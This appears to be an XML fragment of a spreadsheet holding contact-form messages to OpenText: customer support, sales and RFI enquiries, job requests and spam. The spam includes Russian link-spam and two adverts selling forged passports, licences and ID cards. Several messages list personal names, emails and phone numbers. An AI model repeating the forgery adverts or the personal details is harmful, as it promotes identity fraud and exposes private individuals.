    <t>Unable to create ticket on Opentext website. Requesting assistance as our production Rightfax application has stopped sending faxes out. Incoming faxes still seem to be working. Please urgently assist.</t>
  </si>
  <si>
    <t>We are from Wellsfargo and looking for help on product 1.EnCase and 2.EnCase eDiscovery. Need support on mentioned products latest version details, latest version release notes, and latest version links. Looking forward for your support. Please respond to my email id:sandeep.ittamalla@wellsfargo.com.Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Enterprise Content Management (ECM) Software Users?_x000D_
_x000D_
This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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Note: We have a discount of 20%_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards,_x000D_
Julie Channing</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to download software which I have purchased , Get error "We're sorry, your account does not grant you access to this resource." Thanks </t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Greetings from Pharma Research 2018!_x000D_
_x000D_
Conference Series LLC cordially invites you to the “International Conference on_x000D_
Pharmaceutical Research and Development” going to be held from June 06-07, 2018 in Baltimore, USA. The theme of the conference is “Overcoming the challenges in pharmaceutical research”. _x000D_
_x000D_
The conference provides an exceptional opportunity to promote your organization and would be an excellent chance to meet colleagues, to exchange knowledge and experience, and to extend your list of contacts._x000D_
This event will provide a broad ranging platform for informative and interactive discussions with contributions by recognized experts from:_x000D_
•             Industry_x000D_
•             Associations _x000D_
•             Academia_x000D_
_x000D_
Have a glance on various opportunities at Pharma Research 2018:_x000D_
Sponsorships/Exhibitions Levels_x000D_
•	Elite sponsor - USD 7500_x000D_
•	Gold sponsor  - USD 5000 _x000D_
•	Silver sponsor - SD 3500 _x000D_
•	Exhibitions - USD 1500				_x000D_
_x000D_
Pharma Research 2018 is offering Exhibitor opportunity at the venue who intends to showcase their new and emerging technologies._x000D_
_x000D_
Exhibitor Benefits:_x000D_
•             One complimentary congress registration _x000D_
•             One complimentary speaker opportunity_x000D_
•             An opportunity to sponsor 1 Poster Presentation Award_x000D_
•             One exhibit booth (Size-3X3 sqm) _x000D_
•             Logo recognition on congress website sponsorship page_x000D_
•             Verbal recognition during Opening and Closing Ceremony_x000D_
•             One page add in conference souvenir  _x000D_
•             One insert provided by the exhibitor in the congress delegate bags _x000D_
_x000D_
The organizing committee would like to invite you and your organization to be a part of conference as an Exhibitor/Sponsor. _x000D_
For more information about Sponsorship and Exhibition opportunities, _x000D_
 Please visit: https://research.pharmaceuticalconferences.com/exhibition.php _x000D_
_x000D_
We look forward to have your valuable association with our conference._x000D_
_x000D_
Thanks &amp; Regards</t>
  </si>
  <si>
    <t>We are currently in process of purchasing the RightFax Enterprise Edition fax server (product code: S-CPRFPG2400003). I need to know what type of communications line is required to support this server. Does this use a POTS or E1 line for connection to the telco? I cannot get to any documentation to research this question._x000D_
Thank you. _x000D_
_x000D_
Sharon Engwer</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Arnaud Pecqueur, I work for Verspieren._x000D_
I am a system engineer and I want to upgrade our Exstream version with the engine on z/OS and later install Exstream 9.5.5 on a linux x86 ( with the engine ) and Empower Classic._x000D_
I created an account with the email apecqueur@verspieren.com but I do not think I can download the software mentioned above._x000D_
_x000D_
Can you do the necessary steps to authorize me to download these softwares ?_x000D_
_x000D_
Thank you !_x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>I am trying to raise a support ticket, however it says I am not authorised.  I am able to login but can't raise a support ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Greetings from Beroe Consulting India!!_x000D_
_x000D_
We have been engaged by Nordstrom to conduct a Market Assessment Exercise.  As part of this exercise, we would like to conduct an accurate assessment of your company’s capabilities in Supplier Compliance and Deduction Management solutions. Therefore, we would appreciate it if you could suggest us a time and date of your convenience to initiate a discussion on the topic._x000D_
_x000D_
Please note that this is NOT a formal RFP and Beroe Inc. (https://www.beroeinc.com/) is engaged only as a third party market intelligence provider to gather information and provide appropriate assessments. Nordstrom is the sole decision maker in pursuing this opportunity further. _x000D_
_x000D_
We have the highest regards for confidentiality of your information and we are ready to sign a non-disclosure agreement (NDA), if required.  _x000D_
If you have any questions or need further clarification regarding this request, please revert to us._x000D_
_x000D_
Thank You._x000D_
</t>
  </si>
  <si>
    <t>My support portal not activate and i cant find our license key or open case with technical support engineer, and i make confirmation from emails but still the same problem and my product not add to my portal</t>
  </si>
  <si>
    <t>Vänligen ändra fakturaadress på framtida fakturor (referens/ fakturannr: 9000219586). Den korrekta adressen är: SEB Pension och Försäkring AB, Att: Ulrika Hägerlöf, Accounts Payable, SE-106 40 Stockholm._x000D_
Faktura (9000219586) har skickats två ggr. Vänligen ändra era rutiner. Tack, Patrik</t>
  </si>
  <si>
    <t xml:space="preserve">In the past I've had contact with Stuart Greer. Now I need information for the transfer of a credit amount to your company but the emailadress of Stuart ('sgreer@opentext.com) seems to be no langer available. Can you please give me his current adress or the adres of one of his colleagues?_x000D_
Thanks._x000D_
Leo van der Drift </t>
  </si>
  <si>
    <t>I am signed up for the newsletter. I live in Germany. I want to keep being informed,but do not speak German. How can I unsubscribe from everything that is in German but keep getting it in English?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am a programmer, new for Open Text and need to develop couple of featurs to Open Text document management._x000D_
The first feature for example should add content for files when users upload it._x000D_
_x000D_
I prefer .NET VS and the production database is MS-SQL,_x000D_
_x000D_
I want to install a development envirunment that include the product and the required APIs and tools._x000D_
_x000D_
My question is how can I get the product, _x000D_
(I saw that I can download the AppWork getway and client from your site)_x000D_
_x000D_
Regards,_x000D_
Yoram</t>
  </si>
  <si>
    <t>Could you share contact of Sales Head who gets sales credit for Telekom Malaysia? Need to talk on DiCE Project.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there,_x000D_
I wanted to know few things about RightFax._x000D_
-Can you please advise if it is a cloud based system or do i have to have a server installed on my end?_x000D_
-And is it compatible with Microsoft Azure and supports LDAP and does it support OCR?_x000D_
And i prefer an Email instead of a phone call, so please communicate with me via an email only._x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>N.A. ENGINEERS    offers products and services ranging from various Conveyor Systems, Material Handling Systems, Truck Loaders, Structural Fabrications, Storage Tanks, S S Hand Railings, Posts staircases, and Mezzanine floor work, Pergolas, Canopies, Sky Lights, Trolleys, Display Boards and Bio Gas plants._x000D_
Please check our website:www.na-engineers.com_x000D_
Regards_x000D_
Venkatesh</t>
  </si>
  <si>
    <t>Hi there, this is Lisa from Beaver Cosmetic, we got your website from our friend, who said that you can help us to solve the USA</t>
  </si>
  <si>
    <t>Новости медицины тут [url=http://griskomed.ru/]griskomed.ru[/url]</t>
  </si>
  <si>
    <t>We used GXS based on Windows XP._x000D_
We want to Upgrade GXS for Windows 10. How can we do that? _x000D_
thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please send me a quote for the OpenText LiquidOffice product? We already have Teleform (desktop version) and would like to evaluate the cost of adding LiquidOffice as well. _x000D_
Also, are there any add-on products/components that allow to save Teleform forms as fillable pdf files? _x000D_
Thanks,_x000D_
Olga Mayzel_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - We have a customer (approx. 500 employees) who operates out of China but have regional offices in China, Australia, Thailand, Japan, Germany, Malaysia, &amp; Philippines that are looking to implement a Document Management solution. _x000D_
_x000D_
I'm keen to chat to someone further and send through a list of our initial requirements if this is something you'd be interested in pursuing. _x000D_
_x000D_
Dan </t>
  </si>
  <si>
    <t>Regarding job opening</t>
  </si>
  <si>
    <t>Hello,  I am looking for the contact information for our Opentext/Easylink account manager.  I have taken over management of the Easylink service and would like to discuss our account._x000D_
_x000D_
Specifically I'd like to get the following information if possible:_x000D_
-Historical spend (as far back as we can go)_x000D_
-Usage data_x000D_
-Email addresses, names, or other identifiers to help me understand who uses easylink at Salesforce._x000D_
-Pricing and licensing model_x000D_
-Line item explanation on the Invoices_x000D_
-Instructions and access to online administration portal_x000D_
-Any type of reports you make available to your customers_x000D_
-List of Easylink administrators_x000D_
-Administrator documentation_x000D_
_x000D_
Thank you,_x000D_
Nick Amido_x000D_
Director, Collaboration</t>
  </si>
  <si>
    <t>Require OpenText knowledge centre support access</t>
  </si>
  <si>
    <t>To:  T. Caughell:_x000D_
Re: the validity of the National Standard of Canada, Electronic Records as Documentary Evidence CAN/CGSB-72.34-2017._x000D_
The "Voting Membership" list that appears on the second page of the 72.34-2017 published national standard. It contains your name._x000D_
 The voting was to be done by means of a letter-ballot sometime before March. I know that not all of the people listed in fact voted. Do you know when the vote was held? Did you vote?_x000D_
In June 2015, because of the many serious violations of the required procedures for drafting a National Standard of Canada, I resigned as the chair of the 72.34(2d) drafting committee, and from the entire 72.34(2d) project, as did the other lawyer specialized in this area of the law, Martin Felsky. As a result, the published standard contains a number of errors. I've received complaints about the content of the standard.  But in spite of its many defects, it was declared to be a national standard by the Standards Council of Canada in March, 2017. Therefore, 72.34-2017 should be withdrawn and the drafting project begun again._x000D_
Were you told that Martin Felsky and I had resigned, and the reasons why?_x000D_
See this article, written months before, and posted on the blog Slaw, the month before 72.34-2017 was declared to be National Standard of Canada last March, by the Standards Council of Canada:_x000D_
"Evidence Based Upon National Standards Might Thereby Be Unreliable."_x000D_
at: http://www.slaw.ca/2017/02/02/evidence-based-upon-national-standards-might-thereby-be-unreliable/_x000D_
Because the procedure used minimized the participation of the full committee, many of its members have ceased to participate long before the voting stage. In contrast, when we created the final draft of the original version of 72.34, 14 years ago, which became, 72.34-2005, we used an entirely different procedure, and therefore produced a national standard that has never been criticized or otherwise brought into question. But that original version of 72.34 was rende</t>
  </si>
  <si>
    <t>Hello, I am trying to place an order.  The system works well until it reaches the Paypal page and then announces that there is a problem.   1) Your VP of Sales may want to know about this, 2) is my password saved ? and 3)  Can you let me know when the system is up and running again ?_x000D_
Sincerely,_x000D_
Luc Piessens, P.E.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in get some budgetary quotes on a premise based fax server. </t>
  </si>
  <si>
    <t>We currently are using Fax2Mail and I have some questions...I have no idea who is getting billed for the service and we would like to add another employee on to the account...ax number is 570-279-4013</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.  I am an AE from the Enterprise team.  My customer, Northwestern Mutual Life is looking for a contact to discuss questions regarding HostExplorer from our Connectivity products, but no one from my team knows who to contact.  If you receive this and can point me to the right person, that would be great.  Thank you. </t>
  </si>
  <si>
    <t>Dear OpenText --_x000D_
_x000D_
I have several years of experience with TeamSite, OpenDeploy and LiveSite.  I'm based in Chandler, AZ.  Do you have any paid work for me, or can you please refer me to someone?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
  Shah Khatri_x000D_
  (480) 650-1045_x000D_
  bomproveito@hotmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">please could you quote the below _x000D_
_x000D_
OpenText Exceed 14, X windows (X11)	, 10 licenses_x000D_
_x000D_
thanks, </t>
  </si>
  <si>
    <t>Привет всем участникам! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] Лучшие ужасы 2017 бесплатно [/b] [url=http://inspacefilm.ru/]http://inspacefilm.ru/[/url] _x000D_
http://inspacefilm.ru/semeynyy/ [b] лучшие семейные фильмы список [/b] _x000D_
[url=http://inspacefilm.ru/luchshaya-fantastika-spisok-filmov/] Лучшая фантастика 2017 в хорошем качестве [/url] _x000D_
[url=http://inspacefilm.ru/uzhasy/] 2017 в хорошем качестве hd 720 лучшие ужасы [/url] 2017 в хорошем качестве hd 720 лучшие ужасы _x000D_
http://inspacefilm.ru/boevik/1544-pravda-o-filme-igra-smerti-jue-dou-si-wang-da-1981.html [b] Смотреть Правда о фильме «Игра смерти» / Jue dou si wang da (1981) онлайн бесплатно [/b] _x000D_
[url=http://inspacefilm.ru/newskino/11086-novym-zorro-stanet-gael-garsia-bernal.html] Новым Зорро станет Гаэль Гарсиа Берналь [/url] _x000D_
и Здесь: http://inspacefilm.ru/boevik/9999-fantasticheskaya-chetverka-fantastic-four-2015.html</t>
  </si>
  <si>
    <t>Need a contact for New Avon to open an account. Plz contact via email</t>
  </si>
  <si>
    <t>User has Windows 10, Office 2016. When opening Excel, states the DDEOpen cannot be found._x000D_
Office has macro enabled, on all applications._x000D_
There are no disabled Add-in_x000D_
Only one Add-in for DM in list</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are currently using HostExplorer for Win32 version 14.0.2.435 to launch TN3270.  Would you please let me know if this version supports TLS 1.2 Secure Layer Encryption?  If not, which newer version of HostExplorer does?  Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Access to xPression Suite 4.6 Installs and Documentation.</t>
  </si>
  <si>
    <t>Mailed payment for account #90569 to PO Box 791247, Baltimore, MD 21279 and it was returned (this address was given to us from OneSource, our previous phone/internet billing provider). Please provide us with a good mailing address for payments. Thank you.</t>
  </si>
  <si>
    <t>This is my third request for help. I need instructions for migrating BizManager and TrustedLink to a new IBM server. I previously worked with Cesar on case SR 1-3083489604 to determine that neither program requires an upgrade (going from V5r4 to V7r1). However, I never received instructions on the steps to migrate from the old server to the new server. Please advise!_x000D_
(customer is Fernco in Davison, MI)._x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
We are moving to Windows 10 at the Corporation of London.  Please could you tell me what version of Rightfax is supported by OpenText in Windows 10 and whether the Corporation are licensed to use it?_x000D_
_x000D_
Many Thanks for your help_x000D_
Hollie</t>
  </si>
  <si>
    <t xml:space="preserve">Request for information in regards with the Exstream product </t>
  </si>
  <si>
    <t>W-9_x000D_
Good  morning in order to process payment for invoice 9000256220 we need a completed W-9 on file.  Please forward to cknopp@descogroup.com.  Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested in Opt-In list of Insurance Industry Decision Makers Lists? _x000D_
_x000D_
If so, you are at the right place. Please let me know your requirement to get a quote and few sample contacts at no cost._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bert Connell</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Afin de proposer votre DAM, j'aimerais avoir les informations suivantes:_x000D_
- Accessibilité : possibilité de rendre accessible la médiathèque (sous la forme d’un extranet / d’un site ouvert ou via un intranet)_x000D_
- Capacité de stockage_x000D_
- Type de stockage (média photo, video, image, document...)_x000D_
- Présence d'un back office pour les utilisateurs_x000D_
- Système de recherche / tri : recherche sur un mot clé (ou autres)_x000D_
- Sécurité (base de données cryptées ?)_x000D_
Merci infiniment, _x000D_
_x000D_
Cordialement,_x000D_
Rebron Natalia</t>
  </si>
  <si>
    <t>I need access to the support area for partner.</t>
  </si>
  <si>
    <t>I have a question about an invoice I received from Easylink</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
i am looking for job changes so ,</t>
  </si>
  <si>
    <t xml:space="preserve">Requirement to Archive Plc data (Email, Folders, Paper and Application data) as a result of our managed separation. Not sure which OpenText tool would be best fit. </t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
I was wondering if you had the chance to go through that e-mail I sent you._x000D_
_x000D_
If so - I am open for a quick chat to see if we can do something together._x000D_
_x000D_
Don't hesitate to contact me._x000D_
_x000D_
Regards,_x000D_
_x000D_
Andrey_x000D_
_x000D_
_x000D_
Andrey Genchev_x000D_
Business Development_x000D_
Prime Holding JSC_x000D_
m: +44 1 590 700 027_x000D_
e: andrey@primeholding.com_x000D_
w: www.primeholding.com</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am a developer at Kantar Germany GmbH which is part of Kantar/WPP PLC. We maintain an eDocs instance for several years now. At the moment it is running version 10 but will be upgraded to 16.2 soon. For one of our systems I need access to the eDocs RESTFull API which is included with the 16.2 release. However I seem to be unable to find the docs for the API at https://developer.opentext.com/. _x000D_
Can you point me to where to find it? _x000D_
_x000D_
Thanks in advance,_x000D_
Florian Betz</t>
  </si>
  <si>
    <t>To inquire about digital signature capabilities in OpenText</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
This is Abid from Momin Solutions. We specialize in extending IT teams with software engineers, Scrum Masters, and QA specialists. The extended teams are available in our development centres. It is like your own IT team located in another room – maintaining your company culture and working in line with your strategic goals. _x000D_
We are not only helping business to focus on new products and features without defocusing the core team but also reduce their staffing cost. We can provide quick scale out to achieve growth. Our forte is that we provide you resource(s) of your choice who works dedicatedly with you in our development centres just like your own employee; however, you do not have any obligation towards those employee(s). So, ultimately you are the person in control of the project and work._x000D_
We provide flexible and direct access to the resource(s). We take care of everything including recruitment, retention, attendance, payroll, compliance, monitoring, benefits, work space, equipment and utilities etc. _x000D_
Please suggest an appropriate time to discuss your requirements in more detail._x000D_
Abid Raja_x000D_
Extended Teams Executive_x000D_
abid.raja@mominsolutions.com_x000D_
Momin Solutions Limited_x000D_
www.mominsolutions.com_x000D_
Tel: +44 (0) 203 743 8500 _x000D_
</t>
  </si>
  <si>
    <t>Request for My Support account access (Contract No. 30404114D/ RC178361)</t>
  </si>
  <si>
    <t>Hello,_x000D_
This proposal is not for just one idea but an offer to your company to adopt a vastly better way to get many innovations quickly and so affordably compared to piece-meal third-party submissions._x000D_
By outsourcing your idea sourcing to us, you'll be connected with world class idea creators from all across the world, generating hundreds of relevant and valuable ideas through crowd-sourcing._x000D_
You can sign up immediately and start receiving ideas within hours._x000D_
Want to be the star of your company’s ideas and innovations sourcing?_x000D_
Source for hundreds of fresh ideas fast with their intellectual property attributed to your company at just a fraction of an average patent. To find out more, sign up and get details here;_x000D_
www.SourceGreatIdeas.com_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Trying to reach in vain the office representing Opentext in Africa, South Africa. Could you please help as I need key and urgent information for Opentext product large scale require implementation here in Algeria</t>
  </si>
  <si>
    <t xml:space="preserve">Ooredoo would like to initiate a Request for Information (RFI) process to identify a suitable partner to assist us on designing, managing and optimizing business processes through a suitable BPM tool._x000D_
_x000D_
We would like to ask for an e-mail address from you company to forward the official RFI to._x000D_
_x000D_
Awaiting for your response._x000D_
_x000D_
Kind regards,_x000D_
Nasser Al-Zeyara_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
We are in process of releasing an RFI to acquire a BPM tool. We would like to have contact details from your end whom we can share the RFI with. Please suggest on the same at earliest._x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Request information on Documentum application </t>
  </si>
  <si>
    <t>looking distributor in Thailand</t>
  </si>
  <si>
    <t>Привет всем участникам форума! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinokub.net/]Лучшие фантастика 2017 в хорошем качестве[/url] _x000D_
Здесь: http://kinokub.net/news/3769-amerikanskaya-semeyka-dozhdalas-popolneniya.html [b] «Американская семейка» дождалась пополнения [/b] _x000D_
Здесь: [url=http://kinokub.net/raznoe/5239-zhazhda-voyna-za-vodu-vodnyy-terror-waterborne-2005.html] Смотреть Жажда, война за воду / Водный террор / Waterborne (2005) онлайн бесплатно [/url] _x000D_
Здесь: http://kinokub.net/news/12930-transformery-5-startovali-v-kitae-s-rekordom-serii.html _x000D_
http://kinokub.net/komediya/ [b] Список 2017 лучшие комедии [/b] _x000D_
[url=http://kinokub.net/uzhasy/] Лучшие ужасы 2017 онлайн [/url] _x000D_
[url=http://kinokub.net/luchshaya-fantastika-spisok-smotret-onlayn/] 2017 смотреть лучшие фантастика [/url] 2017 смотреть лучшие фантастика</t>
  </si>
  <si>
    <t xml:space="preserve">My car wont start may cause ecm problem </t>
  </si>
  <si>
    <t>INTERES EN EL PRODUCTO</t>
  </si>
  <si>
    <t>I HAVE OPEN TEXT SECURE SHELL 1.0; WITH PATCH 1.0.4; FOR WIN 7 PROF 64 BIT._x000D_
ARE THERE ANY NEWER VERSIONS/UPGRADES AVAILABLE?_x000D_
_x000D_
THANX,_x000D_
_x000D_
RJR</t>
  </si>
  <si>
    <t xml:space="preserve">Find movie and film cast and crew information for DCI Banks [TV Series] (2010) - on AllMovie. Outsiders TV Series 2016 IMDb ,Uriah HeepOutsider Music ,Outsider Club Outsiders TV Series 2016 IMDb ,Outsider Club Because You ll Never Be On The  _x000D_
http://supercoolshop.co _x000D_
When I got home from the Eagles show last night, I watched this &amp; I was totally WOWED! Joe &amp; Daryl sounded awesome together!. They started 'Bloodline' Season 3 Spoilers: the Family Drama Deeper Than Ever	28 Jun 2016 News about a Bloodline Season 3 is still under wraps because Netflix has not made any statement about renewing the TV series. With Season </t>
  </si>
  <si>
    <t>Hi Can you tell me if the Firstclass server is down over Thanksgiving?_x000D_
My alternative email address is tomkernan77@gmail.com_x000D_
Thanks _x000D_
Tom</t>
  </si>
  <si>
    <t>To know if there is a space for job</t>
  </si>
  <si>
    <t>Looking for job in analytics ..</t>
  </si>
  <si>
    <t>In placement insight we facilitate engineering graduates to chose their right IT career and present the possible opportunities available in the market. We would really like to partner with you to carve best future for the young and passionate graduates and professional . Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our company is a unique producer of quality fake documents. We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italy, Finland, France, Germany, Netherlands, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
sale false/fake passports of Afghanistan _x000D_
sale false/fake passports of Albania _x000D_
sale false/fake passports of Algeria _x000D_
sale false/fake passports of Andorra _x000D_
sale false/fake passports of Angola _x000D_
sale false/fake passports of Antigua &amp; Deps _x000D_
sale false/fake passports of Argentina _x000D_
sale false/fake passports of Armenia _x000D_
sale false/fake passports of Australia _x000D_
sale false/fake passports of Austria _x000D_
sale false/fake passports of Azerbaijan _x000D_
sale false/fake passports of Bahamas _x000D_
sale false/fake passports of Bahrain _x000D_
sale false/fake passports of Bangladesh _x000D_
sale false/fake passports of Barbados _x000D_
sale false/fake passports of Belarus _x000D_
sale false/fake passports of Belgium _x000D_
sale false/fake passports of Belize _x000D_
sale false/fake passports of Benin _x000D_
sale false/fake passports of Bhutan _x000D_
sale false/fake passports of Bolivia _x000D_
sale false/fake passports of Bosnia Herzegovina _x000D_
sale false/fake passports of Botswana _x000D_
sale false/fake passports of Brazil _x000D_
sale false/fake passports of Brunei _x000D_
sale false/fake passports of Bulgaria _x000D_
sale false/fake passports of Burkina _x000D_
sale false/fake passports of Burundi _x000D_
sale false/fake passports of Cambodia _x000D_
sale false/fake passports of Cameroon _x000D_
sale false/fake passports of Canada _x000D_
sale false/fake passports of Cape Verde _x000D_
sale false/fake passports of Central Africa</t>
  </si>
  <si>
    <t>Hello! I own my own business and I am looking for a very affordable DAM/CAM system to assist me in managing my digital assist. I don’t have any other staff or employees. I would be interested to see how your company could meet me needs. Thank you for your time.</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
We have an Urgent query and hope to get response ASAP. We have bough SAP License with SAP Extended Enterprise Content Management with Open Text,_x000D_
_x000D_
We are about to place order for Hardware procurement.Can you pls explain me how to _x000D_
get the Harware Sizing done for Open Text Hardware._x000D_
_x000D_
what are the input parameters to be given for the HW Sizing , I would appreciate i you could share documents and a sample sizing document for understanding._x000D_
_x000D_
Regards,_x000D_
_x000D_
Azeem.</t>
  </si>
  <si>
    <t>Приветствую всех! _x000D_
Нашел Приколы с Фото на этом сайте:  http://limonos.ru : _x000D_
http://limonos.ru/foto-prikoly-interesnoe/6428-mastera-shaolinya.html [b] Мастера Шаолиня [/b] _x000D_
[url=http://limonos.ru/foto-prikoly-interesnoe/1210-slitye-bezopasnye-fotochki-golyh-znamenitostey.html] Слитые безопасные фоточки голых знаменитостей [/url] _x000D_
http://limonos.ru/interesnoe/7797-arhitektura-buduschego.html _x000D_
http://limonos.ru/foto-prikoly-interesnoe/2906-doneck-segodnya.html</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for job </t>
  </si>
  <si>
    <t xml:space="preserve">Комплесная установка системм контроля доступа в офис, магнитный замок по карточкам от 10 тысяч рублей _x000D_
 _x000D_
[url=http://video-stb.ru]вскрытие замков авто[/url] _x000D_
&lt;a href=https://www.video-stb.ru/catalog/magnitnye-zamki/&gt;поставить магнитный замок на дверь&lt;/a&gt;_x000D_
 _x000D_
[url=https://www.video-stb.ru/catalog/ustanovka-domofonov/]установка домофона[/url]_x000D_
 _x000D_
&lt;a href=https://www.video-stb.ru/catalog/ustanovka-dvernykh-zamkov/&gt;установка межкомнатных замков&lt;/a&gt;_x000D_
 _x000D_
&lt;a href=https://www.video-stb.ru/catalog/elektromekhanicheskie-zashchelki/&gt;установка электромеханического замка в подъезде&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our team is a unique producer of quality fake documents. _x000D_
We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italia, Finland, France, Germany, Israel, Mexico, Netherlands, Sweden, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Australia _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Austria _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of USA _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of UK _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Canada _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Germany _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Italy _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of France _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Finland _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Norway _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Denmark _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Sweden _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of Ireland _x000D_
 _x000D_
Purchase High Quality Original and Fake Passports, Driver's License _x000D_
and Ids of China _x000D_
 </t>
  </si>
  <si>
    <t>В первую очередь укладывается металлическая сетка, к которой будет прикреплен нагревательный элемент. Перед заливкой стяжки, необходимо четко спланировать положение кабеля и его муфт, выходов под подключение электросети, регулятор и термостат, подробнее читайте на сайте [url=http://remstroitelstvo.ru]remstroitelstvo.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a contact within your company that I can send an MNDA to to fill out prior to our company having discussions about a document management system solution. An email or phone number of someone would be helpful._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need assistance transferring and/or downloading software and license to new computer.   </t>
  </si>
  <si>
    <t>I have a 1988 Buick LeSabre keeps turning over will not start what could it be</t>
  </si>
  <si>
    <t>Student Placement January 2018 - _x000D_
Hi, I am writing to you to inquire about possible openings you have for students undertaking placement. I am based in County Cork in Ireland and attend Cork institute of Technology Currently in final year of my Bsc. Information Technology. ( https://courses.cit.ie/index.cfm/page/course/courseId/1856 ) _x000D_
_x000D_
If there are any positions that would suit me please feel free to contact me for my CV._x000D_
_x000D_
Kind regards,_x000D_
Nick._x000D_
...</t>
  </si>
  <si>
    <t>It's about analysing user behaviour for our app =&gt; http://itunes.apple.com/us/app/friendo-the-best-friend-game/id1087348389?mt=8</t>
  </si>
  <si>
    <t>i am interested to work with you guys. let me know your email so i can send my resume.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
 _x000D_
We wish to participate in a tender for the provision of  " Committee Management System" to a Council in the United Kingdom. _x000D_
 _x000D_
The detail of requirements is attached herewith for your review. Our role will be to act as your re-sellers and we will also provide after sale service/support to the Council, if required._x000D_
 _x000D_
We request you to please send us your best competitive prices along with the detailed technical literature, if you can provide the said System. _x000D_
 _x000D_
Your offer must reach us by 27/11/2017, the latest. However you must confirm immediately that you are sending your quote by the due date._x000D_
 _x000D_
An immediate response to this e-mail will be highly appreciated._x000D_
_x000D_
With kind regards,_x000D_
                                             _x000D_
G N Shahid_x000D_
Icecube Technologies Ltd_x000D_
T: +44 (0) 1254 498914  M: +44 (0)7784 447006_x000D_
E-Mail: gns@icecubetechnologies.co.uk_x000D_
_x000D_
_x000D_
Icecube Technologies Ltd_x000D_
12 Wellington Fold_x000D_
Darwen_x000D_
Lancashire_x000D_
BB3 1PU_x000D_
United Kingdom_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Required to get more information on documentum which we are looking to implement for our organization  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
